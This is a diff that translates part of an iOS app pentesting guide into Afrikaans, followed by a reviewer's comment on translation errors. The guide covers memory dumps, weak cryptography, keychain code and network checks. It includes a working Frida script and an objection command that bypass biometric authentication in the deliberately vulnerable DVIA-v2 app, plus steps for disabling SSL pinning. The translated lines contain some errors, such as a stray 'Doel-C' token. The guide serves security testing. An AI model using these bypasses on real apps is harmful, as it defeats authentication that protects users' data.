- -To extract strings from a memory dump, commands such as `strings` or `rabin2 -zz` can be used: +Vir beide gekraakte en nie-gekraakte toestelle, maak gereedskap soos [objection](https://github.com/sensepost/objection) en [Fridump](https://github.com/Nightbringer21/fridump) dit moontlik om 'n toepassing se prosesgeheue te dump. Nadat dit gedump is, vereis die analise van hierdie data verskeie gereedskap, afhangende van die aard van die inligting wat jy soek. +Om strings uit 'n geheue-dump te onttrek, kan opdragte soos `strings` of `rabin2 -zz` gebruik word: ```bash # Extracting strings using strings command $ strings memory > strings.txt 
@@ -776,75 +731,68 @@ $ strings memory > strings.txt # Extracting strings using rabin2 $ rabin2 -ZZ memory > strings.txt ``` - -For more detailed analysis, including searching for specific data types or patterns, **radare2** offers extensive search capabilities: - +Vir meer gedetailleerde analise, insluitend die soeke na spesifieke datatipes of patrone, bied **radare2** uitgebreide soekmoontlikhede: ```bash $ r2 [0x00000000]> /? ... ``` +## **Uitvoertydgeheue-analise** -## **Runtime Memory Analysis** - -**r2frida** provides a powerful alternative for inspecting an app's memory in real time, without needing a memory dump. This tool enables the execution of search commands directly on the running application's memory: - +**r2frida** bied 'n kragtige alternatief vir die inspekteer van 'n toepassing se geheue in werklike tyd, sonder om 'n geheue-dump te benodig. Hierdie instrument maak dit moontlik om soekopdragte direk op die lopende toepassing se geheue uit te voer: ```bash $ r2 frida://usb// [0x00000000]> /\ ``` +## Gebroke Kriptografie -## Broken Cryptography +### Swak Sleutelbestuurprosesse -### Poor Key Management Processes +Sommige ontwikkelaars stoor sensitiewe data in die plaaslike stoor en versleutel dit met 'n sleutel wat hardgekodifiseer/voorspelbaar in die kode is. Dit moet nie gedoen word nie, aangesien sommige omkeerwerk dit moontlik maak vir aanvallers om die vertroulike inligting te onttrek. -Some developers save sensitive data in the local storage and encrypt it with a key hardcoded/predictable in the code. This shouldn't be done as some reversing could allow attackers to extract the confidential information. +### Gebruik van Onveilige en/of Verouderde Algoritmes -### Use of Insecure and/or Deprecated Algorithms +Ontwikkelaars moet nie **verouderde algoritmes** gebruik om outorisasie **toetse** uit te voer, data te **stoor** of te **stuur** nie. Sommige van hierdie algoritmes is: RC4, MD4, MD5, SHA1... 
As **hasings** byvoorbeeld gebruik word om wagwoorde te stoor, moet hasings wat bestand is teen brutaal krag met sout gebruik word. -Developers shouldn't use **deprecated algorithms** to perform authorisation **checks**, **store** or **send** data. Some of these algorithms are: RC4, MD4, MD5, SHA1... If **hashes** are used to store passwords for example, hashes brute-force **resistant** should be used with salt. +### Toets -### Check - -The main checks to perform if to find if you can find **hardcoded** passwords/secrets in the code, or if those are **predictable**, and if the code is using some king of **weak** **cryptography** algorithms. - -It's interesting to know that you can **monitor** some **crypto** **libraries** automatically using **objection** with: +Die belangrikste toetse om uit te voer is om te kyk of jy **hardgekodifiseerde** wagwoorde/geheime in die kode kan vind, of dit **voorspelbaar** is, en of die kode van 'n soort **swak** **kriptografie**-algoritmes gebruik maak. +Dit is interessant om te weet dat jy sommige **kripto**-biblioteke outomaties kan **monitor** deur **objection** te gebruik met: ```swift ios monitor crypt ``` +Vir **meer inligting** oor iOS kriptografiese API's en biblioteke, besoek [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography) -For **more information** about iOS cryptographic APIs and libraries access [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06e-testing-cryptography) +## Plaaslike Verifikasie -## Local Authentication +**Plaaslike verifikasie** speel 'n belangrike rol, veral wanneer dit kom by die beskerming van toegang tot 'n afgeleë eindpunt deur middel van kriptografiese metodes. 
Die essensie hier is dat sonder behoorlike implementering, plaaslike verifikasiemeganismes omseil kan word. -**Local authentication** plays a crucial role, especially when it concerns safeguarding access at a remote endpoint through cryptographic methods. The essence here is that without proper implementation, local authentication mechanisms can be circumvented. +Apple se **[Plaaslike Verifikasie-raamwerk](https://developer.apple.com/documentation/localauthentication)** en die **[sleutelbos](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html)** bied robuuste API's vir ontwikkelaars om gebruikersverifikasie-dialoge te fasiliteer en geheime data veilig te hanteer. Die Veilige Enclave verseker vingerafdruk-ID vir Touch ID, terwyl Face ID staatmaak op gesigsherkenning sonder om biometriese data in gevaar te stel. -Apple's **[Local Authentication framework](https://developer.apple.com/documentation/localauthentication)** and the **[keychain](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html)** provide robust APIs for developers to facilitate user authentication dialogs and securely handle secret data, respectively. The Secure Enclave secures fingerprint ID for Touch ID, whereas Face ID relies on facial recognition without compromising biometric data. - -To integrate Touch ID/Face ID, developers have two API choices: -- **`LocalAuthentication.framework`** for high-level user authentication without access to biometric data. -- **`Security.framework`** for lower-level keychain services access, securing secret data with biometric authentication. Various [open-source wrappers](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id) make keychain access simpler. 
+Om Touch ID/Face ID te integreer, het ontwikkelaars twee API-keuses: +- **`LocalAuthentication.framework`** vir hoëvlak-gebruikersverifikasie sonder toegang tot biometriese data. +- **`Security.framework`** vir laervlak-sleutelbosdiensetoegang, wat geheime data veilig stel met biometriese verifikasie. Verskeie [oopbron-omhullings](https://www.raywenderlich.com/147308/secure-ios-user-data-keychain-touch-id) maak sleutelbostoegang eenvoudiger. {% hint style="danger" %} -However, both `LocalAuthentication.framework` and `Security.framework` present vulnerabilities, as they primarily return boolean values without transmitting data for authentication processes, making them susceptible to bypassing (refer to [Don't touch me that way, by David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM)). +Nietemin, beide `LocalAuthentication.framework` en `Security.framework` het kwesbaarhede, aangesien hulle hoofsaaklik boole-waardes teruggee sonder om data vir verifikasieprosesse oor te dra, wat hulle vatbaar maak vir omseiling (verwys na [Don't touch me that way, deur David Lindner et al](https://www.youtube.com/watch?v=XhXIHVGCFFM)). {% endhint %} -### Implementing Local Authentication +### Implementering van Plaaslike Verifikasie -To prompt users for authentication, developers should utilize the **`evaluatePolicy`** method within the **`LAContext`** class, choosing between: -- **`deviceOwnerAuthentication`**: Prompts for Touch ID or device passcode, failing if neither is enabled. -- **`deviceOwnerAuthenticationWithBiometrics`**: Exclusively prompts for Touch ID. +Om gebruikers te vra vir verifikasie, moet ontwikkelaars die **`evaluatePolicy`**-metode binne die **`LAContext`**-klas gebruik en kies tussen: +- **`deviceOwnerAuthentication`**: Vra vir Touch ID of toestel wagwoord, faal as geen van beide geaktiveer is nie. +- **`deviceOwnerAuthenticationWithBiometrics`**: Vra eksklusief vir Touch ID. 
-A successful authentication is indicated by a boolean return value from **`evaluatePolicy`**, highlighting a potential security flaw. +'n Suksesvolle verifikasie word aangedui deur 'n boole-waarde wat teruggegee word deur **`evaluatePolicy`**, wat 'n potensiële sekuriteitsfout aandui. -### Local Authentication using Keychain +### Plaaslike Verifikasie met Sleutelbos -Implementing **local authentication** in iOS apps involves the use of **keychain APIs** to securely store secret data such as authentication tokens. This process ensures that the data can only be accessed by the user, using their device passcode or biometric authentication like Touch ID. +Die implementering van **plaaslike verifikasie** in iOS-toepassings behels die gebruik van **sleutelbos-API's** om geheime data soos verifikasie-token te veilig stoor. Hierdie proses verseker dat die data slegs deur die gebruiker toeganklik is deur middel van hul toestel wagwoord of biometriese verifikasie soos Touch ID. -The keychain offers the capability to set items with the `SecAccessControl` attribute, which restricts access to the item until the user successfully authenticates via Touch ID or device passcode. This feature is crucial for enhancing security. +Die sleutelbos bied die vermoë om items met die `SecAccessControl`-eienskap in te stel, wat toegang tot die item beperk totdat die gebruiker suksesvol verifieer deur middel van Touch ID of toestel wagwoord. Hierdie funksie is krities vir die verbetering van sekuriteit. -Below are code examples in Swift and Objective-C demonstrating how to save and retrieve a string to/from the keychain, leveraging these security features. The examples specifically show how to set up access control to require Touch ID authentication and ensure the data is accessible only on the device it was set up on, under the condition that a device passcode is configured. 
+Hieronder is voorbeeldkodes in Swift en Objective-C wat demonstreer hoe om 'n string na die sleutelbos te stoor en te herwin, deur gebruik te maak van hierdie sekuriteitskenmerke. Die voorbeelde wys spesifiek hoe om toegangsbeheer in te stel om Touch ID-verifikasie te vereis en te verseker dat die data slegs toeganklik is op die toestel waarop dit opgestel is, onder die voorwaarde dat 'n toestel wagwoord gekonfigureer is. {% tabs %} {% tab title="Swift" %} @@ -856,12 +804,12 @@ Below are code examples in Swift and Objective-C demonstrating how to save and r var error: Unmanaged? guard let accessControl = SecAccessControlCreateWithFlags(kCFAllocatorDefault, - kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly, - SecAccessControlCreateFlags.biometryCurrentSet, - &error) else { - // failed to create AccessControl object +kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly, +SecAccessControlCreateFlags.biometryCurrentSet, +&error) else { +// failed to create AccessControl object - return +return } // 2. define keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute 
@@ -879,45 +827,45 @@ query[kSecAttrAccessControl as String] = accessControl let status = SecItemAdd(query as CFDictionary, nil) if status == noErr { - // successfully saved +// successfully saved } else { - // error while saving +// error while saving } ``` {% endtab %} -{% tab title="Objective-C" %} +{% tab title="Objective-C" %}Doel-C ```objectivec - // 1. create AccessControl object that will represent authentication settings - CFErrorRef *err = nil; +// 1. create AccessControl object that will represent authentication settings +CFErrorRef *err = nil; - SecAccessControlRef sacRef = SecAccessControlCreateWithFlags(kCFAllocatorDefault, - kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly, - kSecAccessControlUserPresence, - err); +SecAccessControlRef sacRef = SecAccessControlCreateWithFlags(kCFAllocatorDefault, +kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly, +kSecAccessControlUserPresence, +err); - // 2. define keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute - NSDictionary* query = @{ - (_ _bridge id)kSecClass: (__bridge id)kSecClassGenericPassword, - (__bridge id)kSecAttrLabel: @"com.me.myapp.password", - (__bridge id)kSecAttrAccount: @"OWASP Account", - (__bridge id)kSecValueData: [@"test_strong_password" dataUsingEncoding:NSUTF8StringEncoding], - (__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacRef - }; +// 2. define keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute +NSDictionary* query = @{ +(_ _bridge id)kSecClass: (__bridge id)kSecClassGenericPassword, +(__bridge id)kSecAttrLabel: @"com.me.myapp.password", +(__bridge id)kSecAttrAccount: @"OWASP Account", +(__bridge id)kSecValueData: [@"test_strong_password" dataUsingEncoding:NSUTF8StringEncoding], +(__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacRef +}; - // 3. 
save item - OSStatus status = SecItemAdd((__bridge CFDictionaryRef)query, nil); +// 3. save item +OSStatus status = SecItemAdd((__bridge CFDictionaryRef)query, nil); - if (status == noErr) { - // successfully saved - } else { - // error while saving - } +if (status == noErr) { +// successfully saved +} else { +// error while saving +} ``` {% endtab %} {% endtabs %} -Now we can request the saved item from the keychain. Keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not. +Nou kan ons die gestoorde item van die sleutelketting aanvra. Sleutelkettingdienste sal die verifikasievenster aan die gebruiker vertoon en data of nil teruggee, afhangende van of 'n geskikte vingerafdruk voorsien is of nie. {% tabs %} {% tab title="Swift" %} 
@@ -933,67 +881,62 @@ query[kSecUseOperationPrompt as String] = "Please, pass authorisation to enter t // 2. get item var queryResult: AnyObject? let status = withUnsafeMutablePointer(to: &queryResult) { - SecItemCopyMatching(query as CFDictionary, UnsafeMutablePointer($0)) +SecItemCopyMatching(query as CFDictionary, UnsafeMutablePointer($0)) } if status == noErr { - let password = String(data: queryResult as! Data, encoding: .utf8)! - // successfully received password +let password = String(data: queryResult as! Data, encoding: .utf8)! +// successfully received password } else { - // authorization not passed +// authorization not passed } ``` {% endtab %} -{% tab title="Objective-C" %} +{% tab title="Objective-C" %}Doel-C ```objectivec // 1. define query NSDictionary *query = @{(__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword, - (__bridge id)kSecReturnData: @YES, - (__bridge id)kSecAttrAccount: @"My Name1", - (__bridge id)kSecAttrLabel: @"com.me.myapp.password", - (__bridge id)kSecUseOperationPrompt: @"Please, pass authorisation to enter this area" }; +(__bridge id)kSecReturnData: @YES, +(__bridge id)kSecAttrAccount: @"My Name1", +(__bridge id)kSecAttrLabel: @"com.me.myapp.password", +(__bridge id)kSecUseOperationPrompt: @"Please, pass authorisation to enter this area" }; // 2. 
get item CFTypeRef queryResult = NULL; OSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, &queryResult); if (status == noErr){ - NSData* resultData = ( __bridge_transfer NSData* )queryResult; - NSString* password = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding]; - NSLog(@"%@", password); +NSData* resultData = ( __bridge_transfer NSData* )queryResult; +NSString* password = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding]; +NSLog(@"%@", password); } else { - NSLog(@"Something went wrong"); +NSLog(@"Something went wrong"); } ``` {% endtab %} {% endtabs %} -### Detection - -Usage of frameworks in an app can also be detected by analyzing the app binary's list of shared dynamic libraries. This can be done by using `otool`: +### Opmerking +Die gebruik van raamwerke in 'n toepassing kan ook opgespoor word deur die analise van die lys gedeelde dinamiese biblioteke van die toepassingsbinêre. Dit kan gedoen word deur gebruik te maak van `otool`: ```bash $ otool -L .app/ ``` - -If `LocalAuthentication.framework` is used in an app, the output will contain both of the following lines (remember that `LocalAuthentication.framework` uses `Security.framework` under the hood): - +As `LocalAuthentication.framework` in 'n app gebruik word, sal die uitset beide van die volgende lyne bevat (onthou dat `LocalAuthentication.framework` `Security.framework` onder die kap gebruik): ```bash /System/Library/Frameworks/LocalAuthentication.framework/LocalAuthentication /System/Library/Frameworks/Security.framework/Security ``` +As `Security.framework` gebruik word, sal slegs die tweede een vertoon word. -If `Security.framework` is used, only the second one will be shown. 
- -### Local Authentication Framework Bypass +### Plaaslike Verifikasie Raamwerk Omspring #### **Objection** -Through the **Objection Biometrics Bypass**, located at [this GitHub page](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass), a technique is available for overcoming the **LocalAuthentication** mechanism. The core of this approach involves leveraging **Frida** to manipulate the `evaluatePolicy` function, ensuring it consistently yields a `True` outcome, irrespective of the actual authentication success. This is particularly useful for circumventing flawed biometric authentication processes. - -To activate this bypass, the following command is employed: +Deur middel van die **Objection Biometrie Omspring**, wat op [hierdie GitHub-bladsy](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass) gevind kan word, is daar 'n tegniek beskikbaar om die **LocalAuthentication** meganisme te omseil. Die kern van hierdie benadering behels die gebruik van **Frida** om die `evaluatePolicy` funksie te manipuleer, sodat dit altyd 'n `True` uitkoms gee, ongeag die werklike verifikasie sukses. Dit is veral nuttig vir die omseil van gebrekkige biometriese verifikasieprosesse. +Om hierdie omspring te aktiveer, word die volgende bevel gebruik: ```bash ...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios ui biometrics_bypass (agent) Registering job 3mhtws9x47q. Type: ios-biometrics-disable 
@@ -1002,88 +945,81 @@ To activate this bypass, the following command is employed: (agent) [3mhtws9x47q] Marking OS response as True instead (agent) [3mhtws9x47q] Biometrics bypass hook complete ``` - -This command sets off a sequence where Objection registers a task that effectively alters the outcome of the `evaluatePolicy` check to `True`. +Hierdie bevel stel 'n reeks in waar Objection 'n taak registreer wat die uitkoms van die `evaluatePolicy`-toets effektief verander na `True`. #### Frida -An example of a use of **`evaluatePolicy`** from [DVIA-v2 application](https://github.com/prateek147/DVIA-v2): - +'n Voorbeeld van die gebruik van **`evaluatePolicy`** van die [DVIA-v2-toepassing](https://github.com/prateek147/DVIA-v2): ```swift +(void)authenticateWithTouchID { - LAContext *myContext = [[LAContext alloc] init]; - NSError *authError = nil; - NSString *myLocalizedReasonString = @"Please authenticate yourself"; - - if ([myContext canEvaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics error:&authError]) { - [myContext evaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics - localizedReason:myLocalizedReasonString - reply:^(BOOL success, NSError *error) { - if (success) { - dispatch_async(dispatch_get_main_queue(), ^{ - [TouchIDAuthentication showAlert:@"Authentication Successful" withTitle:@"Success"]; - }); - } else { - dispatch_async(dispatch_get_main_queue(), ^{ - [TouchIDAuthentication showAlert:@"Authentication Failed !" 
withTitle:@"Error"]; - }); - } - }]; - } else { - dispatch_async(dispatch_get_main_queue(), ^{ - [TouchIDAuthentication showAlert:@"Your device doesn't support Touch ID or you haven't configured Touch ID authentication on your device" withTitle:@"Error"]; - }); - } +LAContext *myContext = [[LAContext alloc] init]; +NSError *authError = nil; +NSString *myLocalizedReasonString = @"Please authenticate yourself"; + +if ([myContext canEvaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics error:&authError]) { +[myContext evaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics +localizedReason:myLocalizedReasonString +reply:^(BOOL success, NSError *error) { +if (success) { +dispatch_async(dispatch_get_main_queue(), ^{ +[TouchIDAuthentication showAlert:@"Authentication Successful" withTitle:@"Success"]; +}); +} else { +dispatch_async(dispatch_get_main_queue(), ^{ +[TouchIDAuthentication showAlert:@"Authentication Failed !" withTitle:@"Error"]; +}); +} +}]; +} else { +dispatch_async(dispatch_get_main_queue(), ^{ +[TouchIDAuthentication showAlert:@"Your device doesn't support Touch ID or you haven't configured Touch ID authentication on your device" withTitle:@"Error"]; +}); +} } ``` +Om die **omseiling** van Plaaslike Verifikasie te bereik, word 'n Frida-skrips geskryf. Hierdie skrips teiken die **evaluatePolicy**-kontrole en onderskep sy terugroep om te verseker dat dit altyd **success=1** teruggee. Deur die gedrag van die terugroep te verander, word die verifikasie-kontrole effektief omseil. -To achieve the **bypass** of Local Authentication, a Frida script is written. This script targets the **evaluatePolicy** check, intercepting its callback to ensure it returns **success=1**. By altering the callback's behavior, the authentication check is effectively bypassed. - -The script below is injected to modify the result of the **evaluatePolicy** method. It changes the callback's result to always indicate success. 
- +Die onderstaande skrips word ingesluit om die resultaat van die **evaluatePolicy**-metode te wysig. Dit verander die resultaat van die terugroep om altyd sukses aan te dui. ```swift // from https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/ if(ObjC.available) { - console.log("Injecting..."); - var hook = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"]; - Interceptor.attach(hook.implementation, { - onEnter: function(args) { - var block = new ObjC.Block(args[4]); - const callback = block.implementation; - block.implementation = function (error, value) { - - console.log("Changing the result value to true") - const result = callback(1, null); - return result; - }; - }, - }); +console.log("Injecting..."); +var hook = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"]; +Interceptor.attach(hook.implementation, { +onEnter: function(args) { +var block = new ObjC.Block(args[4]); +const callback = block.implementation; +block.implementation = function (error, value) { + +console.log("Changing the result value to true") +const result = callback(1, null); +return result; +}; +}, +}); } else { - console.log("Objective-C Runtime is not available!"); +console.log("Objective-C Runtime is not available!"); } ``` - -To inject the Frida script and bypass the biometric authentication, the following command is used: - +Om die Frida-skrip in te spuit en die biometriese verifikasie te omseil, word die volgende bevel gebruik: ```bash frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-ios.js ``` +## Sensitiewe Funksionaliteit Blootstelling deur IPC -## Sensitive Functionality Exposure Through IPC - -### Custom URI Handlers / Deeplinks / Custom Schemes +### Aangepaste URI Handlers / Deeplinks / Aangepaste Skemas {% content-ref url="ios-custom-uri-handlers-deeplinks-custom-schemes.md" %} 
[ios-custom-uri-handlers-deeplinks-custom-schemes.md](ios-custom-uri-handlers-deeplinks-custom-schemes.md) {% endcontent-ref %} -### Universal Links +### Universele Skakels {% content-ref url="ios-universal-links.md" %} [ios-universal-links.md](ios-universal-links.md) {% endcontent-ref %} -### UIActivity Sharing +### UIActivity Deling {% content-ref url="ios-uiactivity-sharing.md" %} [ios-uiactivity-sharing.md](ios-uiactivity-sharing.md) @@ -1095,7 +1031,7 @@ frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-i [ios-uipasteboard.md](ios-uipasteboard.md) {% endcontent-ref %} -### App Extensions +### App Uitbreidings {% content-ref url="ios-app-extensions.md" %} [ios-app-extensions.md](ios-app-extensions.md) 
@@ -1107,65 +1043,63 @@ frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-i [ios-webviews.md](ios-webviews.md) {% endcontent-ref %} -### Serialisation and Encoding +### Serialisering en Enkodering {% content-ref url="ios-serialisation-and-encoding.md" %} [ios-serialisation-and-encoding.md](ios-serialisation-and-encoding.md) {% endcontent-ref %} -## Network Communication +## Netwerk Kommunikasie -It's important to check that no communication is occurring **without encryption** and also that the application is correctly **validating the TLS certificate** of the server.\ -To check these kind of issues you can use a proxy like **Burp**: +Dit is belangrik om te kontroleer dat geen kommunikasie plaasvind **sonder versleuteling** en dat die toepassing die TLS-sertifikaat van die bediener korrek **valideer**.\ +Om hierdie soort probleme te ondersoek, kan jy 'n proksi soos **Burp** gebruik: {% content-ref url="burp-configuration-for-ios.md" %} [burp-configuration-for-ios.md](burp-configuration-for-ios.md) {% endcontent-ref %} -### Hostname check +### Naam van bediener kontroleer -One common issue validating the TLS certificate is to check that the certificate was signed by a **trusted** **CA**, but **not check** if **the hostname** of the certificate is the hostname being accessed.\ -In order to check this issue using Burp, after trusting Burp CA in the iPhone, you can **create a new certificate with Burp for a different hostname** and use it. If the application still works, then, something it's vulnerable. 
+Een algemene probleem met die validering van die TLS-sertifikaat is om te kontroleer of die sertifikaat deur 'n **vertroude** **CA** onderteken is, maar **nie kontroleer** of **die naam van die bediener** van die sertifikaat die naam van die bediener is wat benader word nie.\ +Om hierdie probleem te ondersoek met behulp van Burp, nadat jy die Burp CA op die iPhone vertrou, kan jy **'n nuwe sertifikaat met Burp vir 'n ander naam van die bediener** skep en dit gebruik. As die toepassing steeds werk, is iets kwesbaar. -### Certificate Pinning +### Sertifikaat Pinning -If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\ -In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) or install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/mobile/config-ios-device) +As 'n toepassing SSL Pinning korrek gebruik, sal die toepassing slegs werk as die sertifikaat die verwagte een is. Wanneer jy 'n toepassing toets, **kan dit 'n probleem wees omdat Burp sy eie sertifikaat sal gebruik.**\ +Om hierdie beskerming binne 'n jailbroken-toestel te omseil, kan jy die toepassing [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) installeer of [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/mobile/config-ios-device) installeer. 
-You can also use **objection's** `ios sslpinning disable` +Jy kan ook **objection's** `ios sslpinning disable` gebruik -## Misc +## Verskillende -* In **`/System/Library`** you can find the frameworks installed in the phone used by system applications -* The applications installed by the user from the App Store are located inside **`/User/Applications`** -* And the **`/User/Library`** contains data saved by the user level applications -* You can access **`/User/Library/Notes/notes.sqlite`** to read the notes saved inside the application. -* Inside the folder of an installed application (**`/User/Applications//`**) you can find some interesting files: - * **`iTunesArtwork`**: The icon used by the app - * **`iTunesMetadata.plist`**: Info of the app used in the App Store - * **`/Library/*`**: Contains the preferences and cache. In **`/Library/Cache/Snapshots/*`** you can find the snapshot performed to the application before sending it to the background. +* In **`/System/Library`** kan jy die raamwerke wat in die foon geïnstalleer is en deur stelseltoepassings gebruik word, vind. +* Die toepassings wat deur die gebruiker van die App Store geïnstalleer is, is geleë binne **`/User/Applications`** +* En die **`/User/Library`** bevat data wat deur gebruikersvlaktoepassings gestoor is. +* Jy kan toegang verkry tot **`/User/Library/Notes/notes.sqlite`** om die notas wat binne die toepassing gestoor is, te lees. +* Binne die vouer van 'n geïnstalleerde toepassing (**`/User/Applications//`**) kan jy 'n paar interessante lêers vind: +* **`iTunesArtwork`**: Die ikoon wat deur die app gebruik word +* **`iTunesMetadata.plist`**: Inligting van die app wat in die App Store gebruik word +* **`/Library/*`**: Bevat die voorkeure en cache. In **`/Library/Cache/Snapshots/*`** kan jy die oorsig vind wat van die toepassing geneem is voordat dit na die agtergrond gestuur is. 
-### Hot Patching/Enforced Updateing +### Warm Patching/Verpligte Opdatering -The developers can remotely **patch all installations of their app instantly** without having to resubmit the application to the App store and wait until it's approved.\ -For this purpose it's usually use [**JSPatch**](https://github.com/bang590/JSPatch)**.** But there are other options also such as [Siren](https://github.com/ArtSabintsev/Siren) and [react-native-appstore-version-checker](https://www.npmjs.com/package/react-native-appstore-version-checker).\ -**This is a dangerous mechanism that could be abused by malicious third party SDKs therefore it's recommended to check which method is used to automatic updating (if any) and test it.** You could try to download a previous version of the app for this purpose. +Die ontwikkelaars kan alle installasies van hul toepassing **onmiddellik herstel** sonder om die toepassing na die App Store te stuur en te wag tot dit goedgekeur word.\ +Hiervoor word gewoonlik [**JSPatch**](https://github.com/bang590/JSPatch)** gebruik.** Maar daar is ook ander opsies soos [Siren](https://github.com/ArtSabintsev/Siren) en [react-native-appstore-version-checker](https://www.npmjs.com/package/react-native-appstore-version-checker).\ +**Dit is 'n gevaarlike meganisme wat misbruik kan word deur kwaadwillige derde party SDK's, daarom word dit aanbeveel om te ondersoek watter metode gebruik word vir outomatiese opdatering (indien enige) en dit te toets.** Jy kan probeer om 'n vorige weergawe van die toepassing af te laai vir hierdie doel. -### Third Parties +### Derde Party -A significant challenge with **3rd party SDKs** is the **lack of granular control** over their functionalities. Developers are faced with a choice: either integrate the SDK and accept all its features, including potential security vulnerabilities and privacy concerns, or forego its benefits entirely. Often, developers are unable to patch vulnerabilities within these SDKs themselves. 
Furthermore, as SDKs gain trust within the community, some may start to contain malware. +'n Belangrike uitdaging met **3de party SDK's** is die **gebrek aan fynkontrole** oor hul funksionaliteite. Ontwikkelaars staan voor 'n keuse: óf die SDK integreer en al sy funksies aanvaar, insluitende potensiële sekuriteitskwessies en privaatheidskwessies, óf die voordele daarvan heeltemal verwerp. Ontwikkelaars is dikwels nie in staat om kwessies binne hierdie SDK's self te herstel nie. Verder, soos SDK's vertroue in die gemeenskap verwerf, mag sommige malware bevat. -The services provided by third-party SDKs may include user behavior tracking, advertisement displays, or user experience enhancements. However, this introduces a risk as developers may not be fully aware of the code executed by these libraries, leading to potential privacy and security risks. It's crucial to limit the information shared with third-party services to what is necessary and ensure that no sensitive data is exposed. +Die dienste wat deur derde party SDK's verskaf word, kan gebruikersgedragopsporing, advertensie-uitstallings of gebruikerservaringsverbeterings insluit. Dit bring egter 'n risiko mee, aangesien ontwikkelaars nie ten volle bewus is van die kode wat deur hierdie biblioteke uitgevoer word nie, wat moontlike privaatheids- en sekuriteitsrisiko's tot gevolg kan hê. Dit is noodsaaklik om die inligting wat met derde party dienste gedeel word, te beperk tot wat nodig is en te verseker dat geen sensitiewe data blootgestel word nie. -Implementation of third-party services usually comes in two forms: a standalone library or a full SDK. To protect user privacy, any data shared with these services should be **anonymized** to prevent the disclosure of Personal Identifiable Information (PII). - -To identify the libraries an application uses, the **`otool`** command can be employed. This tool should be run against the application and each shared library it uses to discover additional libraries. 
+Implementering van derde party dienste kom gewoonlik in twee vorme voor: 'n afsonderlike biblioteek of 'n volledige SDK. Om gebruikersprivaatheid te beskerm, moet enige data wat met hierdie dienste gedeel word, **geanonimiseer** word om die bekendmaking van Persoonlik Identifiseerbare Inligting (PII) te voorkom. +Om die biblioteke wat 'n toepassing gebruik, te identifiseer, kan die **`otool`**-opdrag gebruik word. Hierdie hulpmiddel moet teen die toepassing en elke gedeelde biblioteek wat dit gebruik, uitgevoer word om addisionele biblioteke te ontdek. ```bash otool -L ``` - -## **References & More Resources** +## **Verwysings & Meer Hulpbronne** * [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06b-basic-security-testing#information-gathering](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06b-basic-security-testing#information-gathering) * [iOS & Mobile App Pentesting - INE](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting) 
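Review bot: several technical terms on the `+` lines of this hunk are translated literally and lose their meaning; keep the English terms the rest of the corpus uses. In `### Naam van bediener kontroleer` and the paragraph below it, "hostname" (the fixed term for the name that must match the certificate) becomes "naam van die bediener"; use `### Hostname-kontrole` and "hostname" consistently. `### Warm Patching/Verpligte Opdatering` is a calque: keep "Hot Patching", and "onmiddellik herstel" in the next paragraph means "restore/repair" where the original says the developers can "patch" every installation ("onmiddellik patch"). In the third-party paragraph, "potensiële sekuriteitskwessies" and "kwessies ... te herstel" soften "vulnerabilities"; use "kwesbaarhede". Also, under `Binne die vouer van 'n geïnstalleerde toepassing`, the three sub-bullets (`iTunesArtwork`, `iTunesMetadata.plist`, `/Library/*`) lost their leading indentation on the `+` lines and now render as top-level items instead of children of that bullet; restore the indent.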
